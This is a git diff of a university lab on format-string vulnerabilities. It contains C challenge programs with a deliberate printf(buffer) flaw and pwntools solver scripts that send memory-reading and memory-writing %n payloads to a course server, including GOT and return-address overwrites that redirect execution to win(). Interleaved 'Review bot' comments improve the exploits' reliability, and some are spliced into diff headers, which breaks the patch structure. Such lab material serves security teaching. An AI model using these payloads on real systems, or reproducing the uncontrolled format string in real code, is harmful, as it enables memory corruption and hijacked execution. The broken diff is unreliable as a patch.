diff --git a/pa/lab7/01_local_read b/pa/lab7/01_local_read
new file mode 100755
index 0000000..f554352
Binary files /dev/null and b/pa/lab7/01_local_read differ
diff --git a/pa/lab7/01_local_read.c b/pa/lab7/01_local_read.c
new file mode 100644
index 0000000..85bc168
--- /dev/null
+++ b/pa/lab7/01_local_read.c
@@ -0,0 +1,20 @@
+// gcc -m32 -Wall -Wextra -ggdb -no-pie
+
+#include
+#include
+#include "get_flag.h"
+
+#define BUFFER_LEN 64
+
+char buffer[BUFFER_LEN] = {0};
+
+void vuln() {
+ // Never prints secret_value
+ char *secret_value = get_flag();
+ printf(buffer);
+}
+
+int main() {
+ read(0, buffer, BUFFER_LEN-1);
+ vuln();
+}
diff --git a/pa/lab7/03_write b/pa/lab7/03_write
new file mode 100755
index 0000000..4d66308
Binary files /dev/null and b/pa/lab7/03_write differ
diff --git a/pa/lab7/03_write.c b/pa/lab7/03_write.c
new file mode 100644
index 0000000..842dd4a
--- /dev/null
+++ b/pa/lab7/03_write.c
@@ -0,0 +1,27 @@
+// gcc -m32 -Wall -Wextra -ggdb -no-pie
+
+#include
+#include
+#include "get_flag.h"
+
+#define BUFFER_LEN 128
+
+unsigned int target = 0;
+
+void vuln() {
+ char buffer[BUFFER_LEN] = {0};
+ read(0, buffer, BUFFER_LEN-1);
+
+ printf(buffer);
+
+ if (target != 0) {
+ printf("Success! You hit the target!\n");
+ printf("Here is your flag: %s\n", get_flag());
+ } else {
+ printf("Oops, not quite!\n");
+ }
+}
+
+int main() {
+ vuln();
+}
diff --git a/pa/lab7/04_match_value b/pa/lab7/04_match_value
new file mode 100755
index 0000000..439f2af
Binary files /dev/null and b/pa/lab7/04_match_value differ
diff --git a/pa/lab7/04_match_value.c b/pa/lab7/04_match_value.c
new file mode 100644
index 0000000..0df6840
--- /dev/null
+++ b/pa/lab7/04_match_value.c
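Review bot: In vuln() of 01_local_read.c, `secret_value` is assigned and never read, so the `-Wall -Wextra` flags in the build comment will emit an unused-variable warning, and at any optimization level above the default -O0 the compiler may drop the local entirely, leaving no flag pointer on the stack for the `%N$s` read this exercise depends on. Declaring it `volatile char *secret_value = get_flag();` keeps the store in place; if only the warning matters, `(void)secret_value;` after the printf is enough. The ignored return of `read()` in main is safe here only because the global buffer is zero-initialized and the read is capped at BUFFER_LEN-1, which deserves a one-line comment such as `// buffer stays NUL-terminated: .bss is zeroed and at most BUFFER_LEN-1 bytes are read`.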
@@ -0,0 +1,27 @@
+// gcc -m32 -Wall -Wextra -ggdb -no-pie
+
+#include
+#include
+#include "get_flag.h"
+
+#define BUFFER_LEN 128
+
+unsigned int target = 0;
+
+void vuln() {
+ char buffer[BUFFER_LEN] = {0};
+ read(0, buffer, BUFFER_LEN-1);
+
+ printf(buffer);
+
+ if (target == 327) {
+ printf("Success! You hit the target!\n");
+ printf("Here is your flag: %s\n", get_flag());
+ } else {
+ printf("Oops, not quite! The target was: 327\nCurrent value is %d.\n", target);
+ }
+}
+
+int main() {
+ vuln();
+}
diff --git a/pa/lab7/05_write_specific_byte b/pa/lab7/05_write_specific_byte
new file mode 100644
index 0000000..0e34d3e
Binary files /dev/null and b/pa/lab7/05_write_specific_byte differ
diff --git a/pa/lab7/05_write_specific_byte.c b/pa/lab7/05_write_specific_byte.c
new file mode 100644
index 0000000..35ffdab
--- /dev/null
+++ b/pa/lab7/05_write_specific_byte.c
@@ -0,0 +1,29 @@
+// gcc -m32 -Wall -Wextra -ggdb -no-pie
+
+#include
+#include
+#include "get_flag.h"
+
+#define BUFFER_LEN 128
+
+unsigned int target_before = 0;
+unsigned int target = 0;
+unsigned int target_after = 0;
+
+void vuln() {
+ char buffer[BUFFER_LEN] = {0};
+ read(0, buffer, BUFFER_LEN-1);
+
+ printf(buffer);
+
+ if (((target >> 24) & 0xff) == 2) {
+ printf("Success! You hit the target!\n");
+ printf("Here is your flag: %s\n", get_flag());
+ } else {
+ printf("Oops, not quite! The target was: 2\nCurrent value is %x.\n", target >> 24);
+ }
+}
+
+int main() {
+ vuln();
+}
diff --git a/pa/lab7/06_write_big_number b/pa/lab7/06_write_big_number
new file mode 100755
index 0000000..3c61df3
Binary files /dev/null and b/pa/lab7/06_write_big_number differ
diff --git a/pa/lab7/06_write_big_number.c b/pa/lab7/06_write_big_number.c
new file mode 100644
index 0000000..430393c
--- /dev/null
+++ b/pa/lab7/06_write_big_number.c
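Review bot: The failure message in vuln() of 04_match_value.c prints the `unsigned int target` with `%d`, so any count at or above 2^31 is shown negative, which is exactly the kind of value students end up writing in a `%n` exercise; use `%u` (or `%#x`, as 06_write_big_number.c does). The magic number 327 also appears twice, once in the comparison and once inside the message string, so a `#define TARGET_VALUE 327` keeps the two from drifting apart if the challenge is retuned.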
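Review bot: In 05_write_specific_byte.c the mask in `((target >> 24) & 0xff) == 2` is redundant for a 32-bit `unsigned int`, since the shift already leaves at most eight bits, and the message prints the unmasked `target >> 24`; either drop the mask or apply the same expression in both places so they cannot disagree. Separately, the companion binary `pa/lab7/05_write_specific_byte` is added in this commit with `new file mode 100644` while every other binary here is 100755, so it is not executable after checkout and the `process("05_write_specific_byte")` path in the solver will fail until it is chmod'd; committing a Makefile with the build line from the header comment instead of the binaries would avoid this class of mismatch.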
@@ -0,0 +1,29 @@
+// gcc -m32 -Wall -Wextra -ggdb -no-pie
+
+#include
+#include
+#include "get_flag.h"
+
+#define BUFFER_LEN 128
+
+unsigned int target_before = 0;
+unsigned int target = 0;
+unsigned int target_after = 0;
+
+void vuln() {
+ char buffer[BUFFER_LEN] = {0};
+ read(0, buffer, BUFFER_LEN-1);
+
+ printf(buffer);
+
+ if (target == 0xdeadbeef) {
+ printf("Success! You hit the target!\n");
+ printf("Here is your flag: %s\n", get_flag());
+ } else {
+ printf("Oops, not quite! The target was: 0xdeadbeef\nCurrent value is 0x%08x\n", target);
+ }
+}
+
+int main() {
+ vuln();
+}
diff --git a/pa/lab7/07_call_functions b/pa/lab7/07_call_functions
new file mode 100755
index 0000000..ce4047c
Binary files /dev/null and b/pa/lab7/07_call_functions differ
diff --git a/pa/lab7/07_call_functions.c b/pa/lab7/07_call_functions.c
new file mode 100644
index 0000000..ce68c62
--- /dev/null
+++ b/pa/lab7/07_call_functions.c
@@ -0,0 +1,24 @@
+// gcc -m32 -Wall -Wextra -ggdb -no-pie
+
+#include
+#include
+#include
+
+#define BUFFER_LEN 128
+
+void win() {
+ printf("You win!");
+ system("cat /home/ctf/flag");
+}
+
+void vuln() {
+ char buffer[BUFFER_LEN] = {0};
+ read(0, buffer, BUFFER_LEN-1);
+
+ printf(buffer);
+ puts("Bye!\n");
+}
+
+int main() {
+ vuln();
+}
diff --git a/pa/lab7/08_return b/pa/lab7/08_return
new file mode 100755
index 0000000..d28acc7
Binary files /dev/null and b/pa/lab7/08_return differ
diff --git a/pa/lab7/08_return.c b/pa/lab7/08_return.c
new file mode 100644
index 0000000..89f7609
--- /dev/null
+++ b/pa/lab7/08_return.c
@@ -0,0 +1,23 @@
+// gcc -m32 -Wall -Wextra -ggdb -no-pie
+
+#include
+#include
+#include
+
+#define BUFFER_LEN 128
+
+void win() {
+ printf("You win!");
+ system("cat /home/ctf/flag");
+}
+
+void vuln() {
+ char buffer[BUFFER_LEN] = {0};
+ read(0, buffer, BUFFER_LEN-1);
+
+ printf(buffer);
+}
+
+int main() {
+ vuln();
+}
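Review bot: `win()` in 07_call_functions.c runs `system("cat /home/ctf/flag")` with an unqualified `cat`, so the command is resolved through the PATH of whatever environment the service was started with; if this binary is ever run setuid or behind a wrapper that passes the client's environment through, that is a trivial hijack, and `system("/bin/cat /home/ctf/flag");` costs nothing. `printf("You win!")` has no trailing newline, and with stdout not attached to a terminal it is fully buffered, so if win() is reached through the overwritten `puts` GOT slot (or, in the identical 08_return.c, through a clobbered return address) and the process does not exit cleanly afterwards, the banner never appears even though the flag written by the child `cat` does; `fflush(stdout);` before `system()`, or `setvbuf(stdout, NULL, _IONBF, 0);` at the top of main, fixes that. The same `win()` is duplicated verbatim in 08_return.c in this commit and needs the same two changes.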
diff --git a/pa/lab7/chall_call_functions_again.py b/pa/lab7/chall_call_functions_again.py
new file mode 100644
index 0000000..8ebaeaf
--- /dev/null
+++ b/pa/lab7/chall_call_functions_again.py
@@ -0,0 +1,42 @@
+from pwn import remote, process, p32, ELF
+
+# Does not deal with \0s in any pointers needed
+def print_to_ram(base: int, arg_base: int, data: bytes) -> bytes:
+ addrs: bytes = b""
+ writes: bytes = b""
+ cum_chars: int = 4 * len(data)
+
+ for offset in range(len(data)):
+ addr = base + offset
+ addrs += p32(addr)
+ arg_n = arg_base + offset
+ n = data[offset] - (cum_chars % 256)
+ if n < 8: n += 256
+ print(f"addr={hex(addr)} byte={hex(data[offset])} cum_chars={cum_chars}({hex(cum_chars%256)}) n={n}")
+ write = f"%{n}x%{arg_n}$hhn"
+ print(write)
+ writes += write.encode('utf-8')
+ cum_chars += n
+
+ pl = addrs + writes
+ if b"\0" in pl: raise Exception("Payload requires a \\0")
+ return pl
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25197
+
+conn = remote(HOST, PORT)
+#conn = process("07_call_functions")
+#input()
+
+elf = ELF("07_call_functions")
+got_puts = elf.got['puts']
+win = elf.sym['win']
+pl = print_to_ram(got_puts, 7, p32(win)) + b"\n"
+print(f"Payload: ({len(pl)})", pl, "\n\n")
+
+#pl = b"AAAABBBB.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
+
+conn.send(pl)
+while conn.connected():
+ print(chr(conn.recv(1)[0]), end="", flush=True)
diff --git a/pa/lab7/chall_local_read.py b/pa/lab7/chall_local_read.py
new file mode 100644
index 0000000..a4dc508
--- /dev/null
+++ b/pa/lab7/chall_local_read.py
@@ -0,0 +1,12 @@
+from pwn import remote
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25191
+
+conn = remote(HOST, PORT)
+
+pl = b"%7$s\n"
+
+conn.send(pl)
+while conn.connected():
+ print(chr(conn.recv(1)[0]), end="", flush=True)
diff --git a/pa/lab7/chall_return_address_again.py b/pa/lab7/chall_return_address_again.py
new file mode 100644
index 0000000..692ab44
--- /dev/null
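Review bot: The width correction in print_to_ram, `if n < 8: n += 256`, does not cover the whole range: `n = data[offset] - (cum_chars % 256)` can be as low as -255, and a single +256 then leaves 1..7, so `%1x`..`%7x` print the argument at its natural width (up to eight hex digits on this -m32 target) and every later byte count is off. Taking the residue first, `n = (data[offset] - cum_chars) % 256` followed by `if n < 8: n += 256`, always yields 8..263 because Python's `%` is non-negative; this bites precisely on the small bytes (0x04, 0x08) of a non-PIE 0x0804xxxx `win` address once the running count has wrapped high. Separately, the format mixes unnumbered `%{n}x` with numbered `%{arg_n}$hhn`, which POSIX leaves undefined and only glibc's tolerance makes work; `%1${n}x` makes every conversion positional, printing argument 1 each time, which is fine since only the field width matters.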
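Review bot: The receive loop `while conn.connected(): print(chr(conn.recv(1)[0]), end="", flush=True)` in chall_local_read.py ends by exception rather than by its condition: pwntools' `recv()` raises `EOFError` when the server closes the connection, and in my experience `connected()` only reflects that afterwards, so the script finishes with a traceback that can scroll the flag line away. `print(conn.recvall().decode(errors="replace"))`, or `conn.interactive()` as chall_return_address_again.py in this commit already does, reads to EOF cleanly and avoids the per-byte `chr()` that turns any non-ASCII output into mojibake. The identical loop is copied into six other scripts in this commit.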
+++ b/pa/lab7/chall_return_address_again.py
@@ -0,0 +1,41 @@
+from pwn import remote, process, p32, ELF
+
+# Does not deal with \0s in any pointers needed
+def print_to_ram(base: int, arg_base: int, data: bytes) -> bytes:
+ addrs: bytes = b""
+ writes: bytes = b""
+ cum_chars: int = 4 * len(data)
+
+ for offset in range(len(data)):
+ addr = base + offset
+ addrs += p32(addr)
+ arg_n = arg_base + offset
+ n = data[offset] - (cum_chars % 256)
+ if n < 8: n += 256
+ write = f"%{n}x%{arg_n}$hhn"
+ writes += write.encode('utf-8')
+ cum_chars += n
+
+ pl = addrs + writes
+ if b"\0" in pl: raise Exception("Payload requires a \\0")
+ return pl
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25198
+
+conn = remote(HOST, PORT)
+#conn = process("08_return")
+#input()
+
+elf = ELF("08_return")
+# dest local is ffffcc1c, which is 1$ + 144
+# remote 1$ is ffffdc6c, so dest should be ffffdc5c
+dest = 0xffffdcfc
+win = elf.sym['win']
+pl = print_to_ram(dest, 7, p32(win)) + b"%3$08x\n"
+print(f"Win={hex(win)} Payload: ({len(pl)})", pl, "\n\n")
+
+#pl = b"AAAABBBB.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
+
+conn.send(pl)
+conn.interactive()
diff --git a/pa/lab7/chall_short_local_read.py b/pa/lab7/chall_short_local_read.py
new file mode 100644
index 0000000..17c10cb
--- /dev/null
+++ b/pa/lab7/chall_short_local_read.py
@@ -0,0 +1,12 @@
+from pwn import remote
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25192
+
+conn = remote(HOST, PORT)
+
+pl = b"%7$s\n"
+
+conn.send(pl)
+while conn.connected():
+ print(chr(conn.recv(1)[0]), end="", flush=True)
diff --git a/pa/lab7/chall_write_big_numbers.py b/pa/lab7/chall_write_big_numbers.py
new file mode 100644
index 0000000..61e1684
--- /dev/null
+++ b/pa/lab7/chall_write_big_numbers.py
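Review bot: The comment above `dest` says the remote return-address slot "should be ffffdc5c" while the code sets `dest = 0xffffdcfc`; the arithmetic the comment itself describes (remote `1$` at 0xffffdc6c plus the 144-byte offset measured locally) gives 0xffffdcfc, so the comment is the stale half, and since this value is where the four bytes of `win` land, a reader who "fixes" the code to match the comment will corrupt an unrelated stack slot and just crash the process. Write the derivation instead of the result, `REMOTE_ARG1 = 0xffffdc6c` and `dest = REMOTE_ARG1 + 144  # same 1$-to-retaddr distance as observed locally`, so the two cannot disagree. Note also that a fixed stack address only holds if the remote service runs without ASLR and with the same environment size; the trailing `%3$08x` is emitted by the same printf that performs the write, so it can confirm the guess after the fact but cannot feed it, and if the address turns out to be unstable the leak has to come from a separate connection, which only helps if the process is not re-randomized per connection.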
@@ -0,0 +1,38 @@
+from pwn import remote, process, p32
+
+# Does not deal with \0s in any pointers needed
+def print_to_ram(base: int, arg_base: int, data: bytes) -> bytes:
+ addrs: bytes = b""
+ writes: bytes = b""
+ cum_chars: int = 4 * len(data)
+
+ for offset in range(len(data)):
+ addr = base + offset
+ addrs += p32(addr)
+ arg_n = arg_base + offset
+ n = data[offset] - (cum_chars % 256)
+ if n < 8: n += 256
+ print(f"addr={hex(addr)} byte={hex(data[offset])} cum_chars={cum_chars}({hex(cum_chars%256)}) n={n}")
+ write = f"%{n}x%{arg_n}$hhn"
+ print(write)
+ writes += write.encode('utf-8')
+ cum_chars += n
+
+ pl = addrs + writes
+ if b"\0" in pl: raise Exception("Payload requires a \\0")
+ return pl
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25196
+
+conn = remote(HOST, PORT)
+#conn = process("06_write_big_number")
+#input()
+
+pl = print_to_ram(0x804c044, 7, p32(0xdeadbeef)) + b"\n"
+print(f"Payload: ({len(pl)})", pl, "\n\n")
+#pl = "AAAABBBB.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
+
+conn.send(pl)
+while conn.connected():
+ print(chr(conn.recv(1)[0]), end="", flush=True)
diff --git a/pa/lab7/chall_write_specific_byte.py b/pa/lab7/chall_write_specific_byte.py
new file mode 100644
index 0000000..09c2ba6
--- /dev/null
+++ b/pa/lab7/chall_write_specific_byte.py
@@ -0,0 +1,18 @@
+from pwn import remote, process, p32
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25195
+
+conn = remote(HOST, PORT)
+#conn = process("05_write_specific_byte")
+#input()
+
+tgt_addr = p32(0x804c044+3)
+
+#2 + 256 - 4(ptr) = 254
+pl = tgt_addr+b"%0254x%7$hhn\n"
+#pl = "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
+
+conn.send(pl)
+while conn.connected():
+ print(chr(conn.recv(1)[0]), end="", flush=True)
diff --git a/pa/lab7/chall_write_specific_value.py b/pa/lab7/chall_write_specific_value.py
new file mode 100644
index 0000000..cf8f7ac
--- /dev/null
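Review bot: print_to_ram in chall_write_big_numbers.py is the third verbatim copy of this helper in the commit (chall_call_functions_again.py and chall_return_address_again.py carry the others, differing only in debug prints), and it shares their width defect: `n = data[offset] - (cum_chars % 256)` followed by a single `if n < 8: n += 256` still leaves 1..7 when the difference is -255..-249, producing `%1x`..`%7x` whose output length is not the intended count; `n = (data[offset] - cum_chars) % 256` before the `< 8` adjustment fixes it. Move the helper into one module beside these scripts (say `fmtstr_write.py`) and import it so the fix lands once. The target address `0x804c044` is also hard-coded here and in chall_write_specific_byte.py, while the later scripts already resolve symbols with pwntools; `ELF("06_write_big_number").sym["target"]` survives a rebuild of the binary, which a bare constant does not.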
+++ b/pa/lab7/chall_write_specific_value.py
@@ -0,0 +1,18 @@
+from pwn import remote, process, p32
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25194
+
+conn = remote(HOST, PORT)
+#conn = process("04_match_value")
+#input()
+
+tgt_addr = p32(0x804c040)
+
+#327 - 4(ptr) = 323
+pl = tgt_addr+b"%0323x%7$hn\n"
+#pl = "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
+
+conn.send(pl)
+while conn.connected():
+ print(chr(conn.recv(1)[0]), end="", flush=True)
diff --git a/pa/lab7/chall_write_to_memory.py b/pa/lab7/chall_write_to_memory.py
new file mode 100644
index 0000000..553daba
--- /dev/null
+++ b/pa/lab7/chall_write_to_memory.py
@@ -0,0 +1,16 @@
+from pwn import remote, process, p32
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25193
+
+conn = remote(HOST, PORT)
+#conn = process("03_write")
+#input()
+
+tgt_addr = p32(0x804c040)
+
+pl = tgt_addr+b"AAAA.%7$hhn\n"
+
+conn.send(pl)
+while conn.connected():
+ print(chr(conn.recv(1)[0]), end="", flush=True)
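Review bot: The payload `%0323x%7$hn` in chall_write_specific_value.py writes only the low 16 bits of the running count (4 + 323 = 327), so it reaches the `target == 327` check only because `target` is declared `unsigned int target = 0` in 04_match_value.c and its upper half is already zero; that dependency is worth stating next to the existing arithmetic comment, e.g. `# %hn writes 2 bytes; relies on target's upper half already being 0`. The `0` flag in `%0323x` is harmless but misleading, since the width alone fixes the emitted length, so `%323x` says what is meant. As with the sibling scripts, `0x804c040` would be more robust as `ELF("04_match_value").sym["target"]` than as a bare constant.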